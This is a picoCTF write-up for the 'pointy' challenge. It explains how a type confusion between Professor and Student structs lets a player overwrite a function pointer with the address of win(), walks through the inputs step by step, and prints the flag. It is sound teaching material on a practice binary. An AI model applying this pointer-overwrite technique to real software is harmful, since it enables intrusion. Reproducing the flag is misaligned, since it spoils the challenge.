Challenge Name
Last updated
Was this helpful?
Last updated
Was this helpful?
Exploit the function pointers in this program. It is also found in /problems/pointy_4_3b3533bd4e08119669feda53e8cb0502 on the shell server. Source.
The provided program allows us to enter students and professors. Students can then rate the professors.
The bug in the program is that we can select professors as students and students as professors. We can write the lastScore
of a Professor
and then treat it as a Student
to control the scoreProfessor
field.
The Student
and Professor
struct
s are as follows:
scoreProfessor
is a function pointer that is in the same position relative to the struct
as lastScore
is in Professor
. We can create a Professor
and set the lastScore
variable to the address of win()
. Then, we can convert that professor to a student, which will override the scoreProfessor
pointer and point it to the win()
function. (scoreProfessor
is pointed to giveScoreToProfessor()
on line 79: student->scoreProfessor=&giveScoreToProfessor;
.) Thus, when the scoreProfessor
pointer is called (close to the end of the file: student->scoreProfessor(professor, value);
), the win()
function will be executed and we will get the flag.
Script () Walkthrough:
Allocate a student s1
Allocate a professor p1
Use student s1
to give the score
Give the score to professor p1
Set the lastScore
attribute of professor p1
to the address of win()
The loop in restarts
Allocate another student s2
(only necessary to proceed to next inputs in program)
Allocate another professor p2
(only necessary to proceed to next inputs in program)
Use professor p1
(which has the address of win()
) to give a score. This converts professor p1
to a student, thus overwriting the scoreProfessor
function pointer to win()
.
Give the score to professor p1
. This does not matter since we only care about the last line (student->scoreProfessor(professor, value);
) where scoreProfessor
(aka win()
) is called. You could use p2
here as well since it is the extra professor we created earlier.
Give a score of 0
to professor p1
, but not really since the scoreProfessor
function pointer points to win()
and not giveScoreToProfessor()
since we changed it by converting a Professor
to a Student
.
Run the python script.py USER=<username> PASSWORD=<password>
:
picoCTF{g1v1ng_d1R3Ct10n5_c7465fbf}